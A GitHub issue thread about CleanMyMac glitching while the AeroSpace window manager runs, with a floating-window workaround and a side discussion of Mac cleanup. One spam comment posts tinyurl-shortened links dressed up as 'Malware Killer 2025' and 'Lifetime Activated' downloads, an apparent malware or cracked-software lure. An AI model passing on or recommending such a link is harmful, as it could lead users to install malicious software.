### ISSUE TITLE
CleanMyMac acts weird

### ISSUE THREAD

**Issue by AnirudhG07** [nikitabobko/AeroSpace#827]
**Describe the bug**

There is a very famous app "CleanMyMac". whenever I open it with aerospace, it starts vibrating and acting all weird. Meanwhile if I open it without aerospace running, it works perfectly.

Without aerospace(no number at top)

https://github.com/user-attachments/assets/1f6f2edc-7774-4d6b-87f6-e6949f9e9bbb

With aerospace, you can see the weird vibrations.

https://github.com/user-attachments/assets/bc89c586-1b57-4431-aaa0-dec6a9ac2965

**Related issues you could find**
Please make sure to search for duplicates.
If you couldn't find the duplicates, linking related issues is helpful anyway.

**Comment by AnirudhG07** [comment]
Can we fix this issue please? I really dont like the vibrating CleanMyMac, I have to close aerospace to make it work.

**Comment by BenTenJJ** [comment]
<h1 dir="auto"><a href=https://tinyurl.com/52an6hpr rel="nofollow">Malware Killer 2025 Windows Setup Download Link</a> 👈</h1>
><br>
><br>
><br>
><br>
><br>
><br>
<h1 dir="auto"><a href=https://tinyurl.com/52an6hpr rel="nofollow">Lifetime Activated Link For Mac OS</a> 👈</h1>

**Comment by AnirudhG07** [comment]
> Setting the window to float by default in your aerospace config file may take care of the issue.

Thanks so much for the advice! I'll do so.

> 2. CleanMyMac is mostly bullshit, I would strongly recommend you get rid of it. I know this is beyond the scope but I can't help myself. More than once I've seen it cause damage to someone's machine, and the claims they make are nonsense IMO. You're better off learning how to clean your Mac yourself, and also learning how your Mac mostly cleans itself anyway.

I try my best to keep my clean by myself, but I am not fully aware of good ways to do it. like deep cleaning and sorts since I can only delete files which I can keep track of. Do you mind sharing some ways on how to do so. Its offtopic aerospace, but it would be really nice to get to know this

**Comment by AnirudhG07** [comment]
Thanks for taking your time and explaining me! I m mostly on the safe side you mentioned diff places. most space is taken by apps like docker, WhatsApp, and VM's. Still thanks for all the info!
